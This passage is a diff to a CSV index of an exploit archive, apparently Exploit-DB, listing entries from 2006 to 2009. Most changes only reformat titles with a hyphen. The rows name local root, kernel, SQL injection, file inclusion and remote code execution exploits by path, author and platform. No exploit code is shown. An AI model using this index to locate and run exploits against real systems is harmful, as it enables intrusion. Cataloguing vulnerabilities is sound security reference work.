(/dev/crypto) Local Kernel Denial of Service Exploit",2006-10-24,"Evgeny Legerov",bsd,dos,0 +2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - (/dev/crypto) Local Kernel Denial of Service Exploit",2006-10-24,"Evgeny Legerov",bsd,dos,0 2640,platforms/php/webapps/2640.txt,"UeberProject <= 1.0 (login/secure.php) Remote File Include Vulnerability",2006-10-24,"Mehmet Ince",php,webapps,0 2641,platforms/solaris/local/2641.sh,"Solaris 10 libnspr - constructor Local Root Exploit",2006-10-24,"Marco Ivaldi",solaris,local,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum <= 1.4 (index.php) Remote Blind SQL Injection Exploit",2006-10-24,ajann,asp,webapps,0 @@ -2390,7 +2390,7 @@ id,file,description,date,author,platform,type,port 2697,platforms/php/webapps/2697.php,"Innovate Portal <= 2.0 (acp.php) Remote Code Execution Exploit",2006-11-01,Kacper,php,webapps,0 2698,platforms/php/webapps/2698.pl,"2BGal 3.0 (admin/configuration.inc.php) Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server <= 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0 -2700,platforms/hardware/dos/2700.rb,"Apple Airport 802.11 Probe Response Kernel Memory Corruption PoC",2006-11-01,"H D Moore",hardware,dos,0 +2700,platforms/hardware/dos/2700.rb,"Apple Airport - 802.11 Probe Response Kernel Memory Corruption PoC",2006-11-01,"H D Moore",hardware,dos,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability",2006-11-01,securfrog,php,webapps,0 2702,platforms/php/webapps/2702.php,"Lithium CMS <= 4.04c (classes/index.php) Local File Include Exploit",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 (volume.php) Remote File Include Vulnerability",2006-11-02,GregStar,php,webapps,0 @@ -2425,8 +2425,8 @@ id,file,description,date,author,platform,type,port 2734,platforms/windows/dos/2734.py,"WFTPD Pro Server 3.23.1.1 (APPE) Remote Buffer Overflow PoC",2006-11-07,"Joxean Koret",windows,dos,0 2735,platforms/windows/dos/2735.py,"WarFTPd 1.82.00-RC11 - Remote Denial of Service Exploit",2006-11-07,"Joxean Koret",windows,dos,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability",2006-11-07,HER0,php,webapps,0 -2737,platforms/osx/local/2737.pl,"Xcode OpenBase <= 10.0.0 (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 -2738,platforms/osx/local/2738.pl,"Xcode OpenBase <= 10.0.0 (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 +2737,platforms/osx/local/2737.pl,"Xcode OpenBase <= 10.0.0 - (symlink) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 +2738,platforms/osx/local/2738.pl,"Xcode OpenBase <= 10.0.0 - (unsafe system call) Local Root Exploit (OSX)",2006-11-08,"Kevin Finisterre",osx,local,0 2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Include Vulnerability",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability",2006-11-08,DeltahackingTEAM,php,webapps,0 @@ -2622,7 +2622,7 @@ id,file,description,date,author,platform,type,port 2946,platforms/windows/dos/2946.html,"Microsoft Office Outlook Recipient Control (ole32.dll) Denial of Service Exploit",2006-12-18,shinnai,windows,dos,0 2947,platforms/multiple/dos/2947.pl,"wget <= 1.10.2 (Unchecked Boundary Condition) Denial of Service Exploit",2006-12-18,"Federico L. Bossi Bonin",multiple,dos,0 2948,platforms/php/webapps/2948.txt,"RateMe <= 1.3.2 (main.inc.php) Remote File Include Vulnerability",2006-12-18,"Al7ejaz Hacker",php,webapps,0 -2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 +2949,platforms/multiple/dos/2949.c,"Intel 2200BG 802.11 - Beacon frame Kernel Memory Corruption Exploit",2006-12-19,"Breno Silva Pinto",multiple,dos,0 2950,platforms/windows/local/2950.c,"DeepBurner 1.8.0 - (.dbr) File Parsing Buffer Overflow Exploit",2006-12-19,Expanders,windows,local,0 2951,platforms/multiple/remote/2951.sql,"Oracle <= 9i / 10g (extproc) - Local/Remote Command Execution Exploit",2006-12-19,"Marco Ivaldi",multiple,remote,0 2952,platforms/windows/dos/2952.py,"WinFtp Server 2.0.2 (PASV) Remote Denial of Service Exploit",2006-12-19,shinnai,windows,dos,0 @@ -2837,7 +2837,7 @@ id,file,description,date,author,platform,type,port 3164,platforms/php/webapps/3164.pl,"phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit",2007-01-20,DeltahackingTEAM,php,webapps,0 3165,platforms/php/webapps/3165.txt,"MySpeach <= 2.1b (up.php) Remote Inclusion Vulnerability",2007-01-20,3l3ctric-Cracker,php,webapps,0 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - aim:// URL Handler Format String Exploit PoC",2007-01-21,MoAB,osx,dos,0 -3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 +3167,platforms/osx/dos/3167.c,"Mac OS X 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3168,platforms/windows/remote/3168.java,"Sun Microsystems Java GIF File Parsing Memory Corruption Exploit",2007-01-21,luoluo,windows,remote,0 3169,platforms/php/webapps/3169.txt,"WebChat 0.77 (defines.php WEBCHATPATH) Remote File Include Vuln",2007-01-21,v1per-haCker,php,webapps,0 3170,platforms/windows/remote/3170.pm,"3Com TFTP Service <= 2.0.1 - Remote Buffer Overflow Exploit (Metasploit)",2007-01-21,Enseirb,windows,remote,69 @@ -2892,7 +2892,7 @@ id,file,description,date,author,platform,type,port 3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0 3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability",2007-01-29,GoLd_M,php,webapps,0 3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,dos,0 -3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 +3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 - disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability",2007-01-30,ajann,php,webapps,0 3227,platforms/php/webapps/3227.txt,"CascadianFAQ <= 4.1 (index.php) Remote SQL Injection Vulnerability",2007-01-30,ajann,php,webapps,0 @@ -3049,13 +3049,13 @@ id,file,description,date,author,platform,type,port 3380,platforms/windows/remote/3380.txt,"Kiwi CatTools TFTP <= 3.2.8 - Remote Path Traversal Vulnerability",2007-02-27,"Sergey Gordeychik",windows,remote,0 3381,platforms/windows/remote/3381.pl,"NetProxy <= 4.03 Web Filter Evasion / Bypass Logging Exploit",2007-02-27,"Craig Heffner",windows,remote,0 3382,platforms/php/webapps/3382.txt,"Admin Phorum 3.3.1a (del.php include_path) RFI Vulnerability",2007-02-27,GoLd_M,php,webapps,0 -3383,platforms/plan9/local/3383.c,"Plan 9 Kernel (devenv.c OTRUNC/pwrite) Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 -3384,platforms/linux/local/3384.c,"Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit",2007-02-28,"Kristian Hermansen",linux,local,0 +3383,platforms/plan9/local/3383.c,"Plan 9 Kernel - (devenv.c OTRUNC/pwrite) Local Exploit",2007-02-28,"Don Bailey",plan9,local,0 +3384,platforms/linux/local/3384.c,"Ubuntu/Debian Apache 1.3.33/1.3.34 - (CGI TTY) Local Root Exploit",2007-02-28,"Kristian Hermansen",linux,local,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 (ABOR) Format String DoS Exploit",2007-02-28,"Umesh Wanve",windows,dos,0 3386,platforms/osx/local/3386.pl,"McAfee VirusScan for Mac (Virex) <= 7.7 - Local Root Exploit",2007-02-28,"Kevin Finisterre",osx,local,0 3387,platforms/php/webapps/3387.php,"vBulletin <= 3.6.4 (inlinemod.php postids) Remote SQL Injection Exploit",2007-02-28,rgod,php,webapps,0 3388,platforms/windows/remote/3388.pl,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Exploit (perl)",2007-02-28,"Umesh Wanve",windows,remote,69 -3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 +3389,platforms/linux/remote/3389.c,"madwifi <= 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow Exploit",2007-03-01,"Massimiliano Oldani",linux,remote,0 3390,platforms/asp/webapps/3390.txt,"Angel Lms 7.1 (default.asp id) Remote SQL Injection Vulnerability",2007-03-01,"Craig Heffner",asp,webapps,0 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 (npdivx32.dll) Remote Denial of Service Exploit",2007-03-01,shinnai,windows,dos,0 @@ -3558,7 +3558,7 @@ id,file,description,date,author,platform,type,port 3902,platforms/php/webapps/3902.txt,"R2K Gallery 1.7 (galeria.php lang2) Local File Inclusion Vulnerability",2007-05-11,Dj7xpl,php,webapps,0 3903,platforms/php/webapps/3903.php,"Monalbum 0.8.7 - Remote Code Execution Exploit",2007-05-11,Dj7xpl,php,webapps,0 3905,platforms/asp/webapps/3905.txt,"W1L3D4 Philboard 0.2 (W1L3D4_bolum.asp forumid) SQL Injection Vuln",2007-05-11,gsy,asp,webapps,0 -3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 (block.php Include) Remote File Inclusion Exploit",2007-05-12,Dj7xpl,php,webapps,0 +3906,platforms/php/webapps/3906.htm,"PHP FirstPost 0.1 - (block.php Include) Remote File Inclusion Exploit",2007-05-12,Dj7xpl,php,webapps,0 3907,platforms/php/webapps/3907.txt,"iG Shop 1.4 (page.php) Remote SQL Injection Vulnerability",2007-05-12,gsy,php,webapps,0 3908,platforms/php/webapps/3908.txt,"YAAP <= 1.5 __autoload() Remote File Inclusion Vulnerability",2007-05-12,3l3ctric-Cracker,php,webapps,0 3909,platforms/php/webapps/3909.txt,"Beacon 0.2.0 (splash.lang.php) Remote File Inclusion Vulnerability",2007-05-12,"ThE TiGeR",php,webapps,0 @@ -3876,9 +3876,9 @@ id,file,description,date,author,platform,type,port 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 -4231,platforms/aix/local/4231.c,"IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 -4232,platforms/aix/local/4232.sh,"IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 -4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 +4231,platforms/aix/local/4231.c,"IBM AIX <= 5.3 sp6 - capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 +4232,platforms/aix/local/4232.sh,"IBM AIX <= 5.3 sp6 - pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 +4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 - ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS <= 121 - (pfs.php) Remote File Upload Vulnerability",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x - (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 @@ -4104,7 +4104,7 @@ id,file,description,date,author,platform,type,port 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability",2007-09-26,"Khashayar Fereidani",php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability",2007-09-26,Luna-Tic/XTErner,php,webapps,0 -4460,platforms/linux/local/4460.c,"Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 +4460,platforms/linux/local/4460.c,"Linux Kernel 2.4/2.6 - x86-64 System Call Emulation Exploit",2007-09-27,"Robert Swiecki",linux,local,0 4461,platforms/php/webapps/4461.txt,"lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerability",2007-09-27,GoLd_M,php,webapps,0 4462,platforms/php/webapps/4462.txt,"Chupix CMS 0.2.3 (repertoire) Remote File Inclusion Vulnerability",2007-09-27,0in,php,webapps,0 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion Vulnerability",2007-09-27,"Mehmet Ince",php,webapps,0 @@ -4159,8 +4159,8 @@ id,file,description,date,author,platform,type,port 4512,platforms/php/webapps/4512.txt,"nuseo php enterprise 1.6 - Remote File Inclusion Vulnerability",2007-10-10,BiNgZa,php,webapps,0 4513,platforms/php/webapps/4513.php,"Php-Stats 0.1.9.2 - Multiple Vulnerabilities Exploit",2007-10-10,EgiX,php,webapps,0 4514,platforms/linux/remote/4514.c,"Eggdrop Server Module Message Handling Remote BoF Exploit",2007-10-10,bangus/magnum,linux,remote,0 -4515,platforms/solaris/local/4515.c,"Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 -4516,platforms/solaris/local/4516.c,"Solaris fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)",2007-10-10,qaaz,solaris,local,0 +4515,platforms/solaris/local/4515.c,"Solaris 10 - x86/sparc sysinfo Kernel Memory Disclosure Exploit",2007-09-01,qaaz,solaris,local,0 +4516,platforms/solaris/local/4516.c,"Solaris - fifofs I_PEEK Kernel Memory Disclosure Exploit (x86/sparc)",2007-10-10,qaaz,solaris,local,0 4517,platforms/windows/local/4517.php,"PHP 5.2.4 ionCube extension - safe_mode / disable_functions Bypass",2007-10-11,shinnai,windows,local,0 4518,platforms/php/webapps/4518.txt,"WebDesktop 0.1 - Remote File Inclusion Vulnerabilities",2007-10-11,S.W.A.T.,php,webapps,0 4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0 @@ -4267,7 +4267,7 @@ id,file,description,date,author,platform,type,port 4621,platforms/php/webapps/4621.txt,"patBBcode 1.0 bbcodeSource.php Remote File Inclusion Vulnerability",2007-11-12,p4sswd,php,webapps,0 4622,platforms/php/webapps/4622.txt,"Myspace Clone Script Remote SQL Injection Vulnerability",2007-11-13,t0pP8uZz,php,webapps,0 4623,platforms/php/webapps/4623.txt,"Toko Instan 7.6 - Multiple Remote SQL Injection Vulnerabilities",2007-11-14,k1tk4t,php,webapps,0 -4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel i386_set_ldt() Integer Overflow PoC",2007-11-16,"RISE Security",osx,dos,0 +4624,platforms/osx/dos/4624.c,"Apple Mac OS X 10.4.x Kernel - i386_set_ldt() Integer Overflow PoC",2007-11-16,"RISE Security",osx,dos,0 4625,platforms/windows/local/4625.txt,"Microsoft Jet Engine - .MDB File Parsing Stack Overflow PoC",2007-11-16,cocoruder,windows,local,0 4626,platforms/php/webapps/4626.txt,"Joomla Component Carousel Flash Image Gallery RFI Vulnerability",2007-11-16,Crackers_Child,php,webapps,0 4627,platforms/php/webapps/4627.txt,"ProfileCMS <= 1.0 (id) Remote SQL Injection Vulnerability",2007-11-16,K-159,php,webapps,0 @@ -4332,7 +4332,7 @@ id,file,description,date,author,platform,type,port 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - Remote SQL Injection Vulnerability",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 Active.asp Remote SQL Injection Vulnerability",2007-12-03,BugReport.IR,asp,webapps,0 4688,platforms/windows/dos/4688.html,"VLC 0.86 < 0.86d ActiveX Remote Bad Pointer Initialization PoC",2007-12-04,"Ricardo Narvaja",windows,dos,0 -4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu <= 1228.0 mach-o Local Kernel Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 +4689,platforms/osx/dos/4689.c,"Apple Mac OS X xnu <= 1228.0 - mach-o Local Kernel Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 4690,platforms/osx/dos/4690.c,"Apple Mac OS X 10.5.0 (leopard) vpnd Remote Denial of Service PoC",2007-12-04,mu-b,osx,dos,0 4691,platforms/php/webapps/4691.txt,"Mambo/Joomla Component rsgallery <= 2.0b5 (catid) SQL Injection Vuln",2007-12-05,K-159,php,webapps,0 4692,platforms/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service Exploit",2007-12-05,MADYNES,hardware,dos,0 @@ -4551,7 +4551,7 @@ id,file,description,date,author,platform,type,port 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 (topic) Remote SQL Injection Exploit",2008-01-14,j0j0,php,webapps,0 4909,platforms/windows/remote/4909.html,"Macrovision FlexNet DownloadManager Insecure Methods Exploit",2008-01-14,Elazar,windows,remote,0 4910,platforms/asp/webapps/4910.pl,"RichStrong CMS (showproduct.asp cat) Remote SQL Injection Exploit",2008-01-14,JosS,asp,webapps,0 -4911,platforms/windows/dos/4911.c,"Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 +4911,platforms/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption PoC",2008-01-15,mu-b,windows,dos,0 4912,platforms/php/webapps/4912.txt,"LulieBlog 1.0.1 (delete id) Remote Admin Bypass Vulnerability",2008-01-15,ka0x,php,webapps,0 4913,platforms/windows/remote/4913.html,"Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit",2008-01-15,Elazar,windows,remote,0 4914,platforms/php/webapps/4914.txt,"FaScript FaMp3 1.0 - (show.php) Remote SQL Injection Vulnerability",2008-01-15,"Khashayar Fereidani",php,webapps,0 @@ -4777,10 +4777,10 @@ id,file,description,date,author,platform,type,port 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability",2008-02-18,ka0x,php,webapps,0 5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio 1.0 (categoryId) SQL Injection Vulnerability",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 (username) Local File Inclusion Vulnerability",2008-02-18,muuratsalo,php,webapps,0 -5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 (list) Local Kernel Memory Leak PoC",2008-02-18,mu-b,windows,local,0 -5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 DLMFENC.sys Local Kernel ring0 link list zero PoC",2008-02-18,mu-b,windows,dos,0 +5141,platforms/windows/local/5141.c,"DESlock+ <= 3.2.6 - (list) Local Kernel Memory Leak PoC",2008-02-18,mu-b,windows,local,0 +5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - DLMFENC.sys Local Kernel ring0 link list zero PoC",2008-02-18,mu-b,windows,dos,0 5143,platforms/windows/local/5143.c,"DESlock+ <= 3.2.6 - Local Kernel ring0 link list zero SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 -5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 DLMFDISK.sys Local kernel ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 +5144,platforms/windows/local/5144.c,"DESlock+ <= 3.2.6 - DLMFDISK.sys Local kernel ring0 SYSTEM Exploit",2008-02-18,mu-b,windows,local,0 5145,platforms/php/webapps/5145.txt,"Joomla Component com_pccookbook (user_id) SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla Component com_clasifier (cat_id) SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 @@ -4987,9 +4987,9 @@ id,file,description,date,author,platform,type,port 5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - Remote SQL Injection Vulnerability",2008-04-03,Houssamix,php,webapps,0 5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto (C_ID) SQL Injection Vulnerability",2008-04-03,Stack,php,webapps,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String PoC",2008-04-03,bratax,windows,dos,0 -5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 +5355,platforms/sco/local/5355.sh,"SCO UnixWare < 7.1.4 p534589 - (pkgadd) Local Root Exploit",2008-04-04,qaaz,sco,local,0 5356,platforms/sco/local/5356.c,"SCO UnixWare Reliant HA - Local Root Exploit",2008-04-04,qaaz,sco,local,0 -5357,platforms/sco/local/5357.c,"SCO UnixWare Merge mcd Local Root Exploit",2008-04-04,qaaz,sco,local,0 +5357,platforms/sco/local/5357.c,"SCO UnixWare Merge - mcd Local Root Exploit",2008-04-04,qaaz,sco,local,0 5358,platforms/php/webapps/5358.pl,"XPOZE Pro <= 3.05 (reed) Remote SQL Injection Exploit",2008-04-04,t0pP8uZz,php,webapps,0 5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone (cat_id) SQL Injection Vulnerability",2008-04-04,t0pP8uZz,php,webapps,0 5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 (thumbnails.php) Remote File Disclosure Vulnerability",2008-04-04,HaCkeR_EgY,php,webapps,0 @@ -5457,7 +5457,7 @@ id,file,description,date,author,platform,type,port 5834,platforms/php/webapps/5834.pl,"Comparison Engine Power 1.0 - Blind SQL Injection Exploit",2008-06-17,Mr.SQL,php,webapps,0 5835,platforms/php/webapps/5835.txt,"Bizon-CMS 2.0 (index.php Id) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5836,platforms/php/webapps/5836.txt,"BaSiC-CMS (index.php r) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 -5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 +5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - dne2000.sys kernel ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0 5838,platforms/php/webapps/5838.txt,"FreeCMS.us 0.2 (index.php page) Remote SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 5839,platforms/php/webapps/5839.txt,"ClipShare < 3.0.1 (tid) Remote SQL Injection Vulnerability",2008-06-17,SuNHouSe2,php,webapps,0 5840,platforms/php/webapps/5840.txt,"easyTrade 2.x - (detail.php id) Remote SQL Injection Vulnerability",2008-06-17,N/A,php,webapps,0 @@ -5595,7 +5595,7 @@ id,file,description,date,author,platform,type,port 5975,platforms/php/webapps/5975.txt,"myBloggie 2.1.6 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) Remote SQL Injection Exploit",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - (chatbox.php) Remote SQL Injection Vulnerability",2008-06-30,DNX,php,webapps,0 -5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 (FIRST ANIMATED EXPLOIT) Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 +5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - Local Root Exploit (vga)",2008-07-01,"lul-disclosure inc.",openbsd,local,0 5980,platforms/php/webapps/5980.txt,"Mambo Component n-gallery Multiple SQL Injection Vulnerabilities",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 (hm) Remote File Inclusion Vulnerability",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"php-Agenda 2.2.4 (index.php page) Local File Inclusion Vulnerability",2008-07-01,StAkeR,php,webapps,0 @@ -6070,7 +6070,7 @@ id,file,description,date,author,platform,type,port 6495,platforms/php/webapps/6495.txt,"Explay CMS <= 2.1 Persistent XSS and CSRF Vulnerability",2008-09-19,hodik,php,webapps,0 6496,platforms/windows/dos/6496.c,"DESlock+ <= 3.2.7 - Local Kernel Overflow PoC",2008-09-20,mu-b,windows,dos,0 6497,platforms/windows/dos/6497.c,"DESlock+ <= 3.2.7 - Local Kernel Race Condition Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 -6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 (probe read) Local Kernel Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 +6498,platforms/windows/dos/6498.c,"DESlock+ <= 3.2.7 - (probe read) Local Kernel Denial of Service PoC",2008-09-20,mu-b,windows,dos,0 6499,platforms/php/webapps/6499.txt,"Advanced Electron Forum <= 1.0.6 - Remote Code Execution Vulnerability",2008-09-20,"GulfTech Security",php,webapps,0 6500,platforms/php/webapps/6500.txt,"Explay CMS <= 2.1 Insecure Cookie Handling Vulnerability",2008-09-20,Stack,php,webapps,0 6501,platforms/php/webapps/6501.txt,"MyFWB 1.0 (index.php page) Remote SQL Injection Vulnerability",2008-09-20,0x90,php,webapps,0 @@ -7360,7 +7360,7 @@ id,file,description,date,author,platform,type,port 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution Exploit (mq = off)",2009-01-19,Osirys,php,webapps,0 7822,platforms/multiple/dos/7822.c,"D-Bus Daemon < 1.2.4 - (libdbus) Denial of Service Exploit",2009-01-19,"Jon Oberheide",multiple,dos,0 -7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 bitflipped elf binary (id) Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0 +7823,platforms/qnx/dos/7823.txt,"QNX 6.4.0 - bitflipped elf binary (id) Kernel Panic Exploit",2009-01-19,kokanin,qnx,dos,0 7824,platforms/php/webapps/7824.pl,"Joomla com_pccookbook (recipe_id) Blind SQL Injection Exploit",2009-01-19,InjEctOr5,php,webapps,0 7826,platforms/windows/remote/7826.html,"SmartVmd ActiveX 1.1 - Remote File Overwrite Exploit",2009-01-19,Houssamix,windows,remote,0 7827,platforms/windows/remote/7827.html,"SmartVmd ActiveX 1.1 - Remote File Deletion Exploit",2009-01-19,Houssamix,windows,remote,0 @@ -7770,14 +7770,14 @@ id,file,description,date,author,platform,type,port 8256,platforms/windows/remote/8256.c,"Sysax Multi Server 4.3 - Remote Arbitrary Delete Files Exploit",2009-03-23,"Jonathan Salwan",windows,remote,0 8257,platforms/windows/remote/8257.txt,"Orbit Downloader 2.8.7 - Arbitrary File Deletion Vulnerability",2009-03-23,waraxe,windows,remote,0 8258,platforms/php/webapps/8258.pl,"X-BLC 0.2.0 (get_read.php section) SQL Injection Vulnerability",2009-03-23,dun,php,webapps,0 -8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 +8259,platforms/freebsd/dos/8259.c,"FreeBSD 7.x - (Dumping Environment) Local Kernel Panic Exploit",2009-03-23,kokanin,freebsd,dos,0 8260,platforms/hardware/dos/8260.txt,"Gigaset SE461 WiMAX router Remote Denial of Service 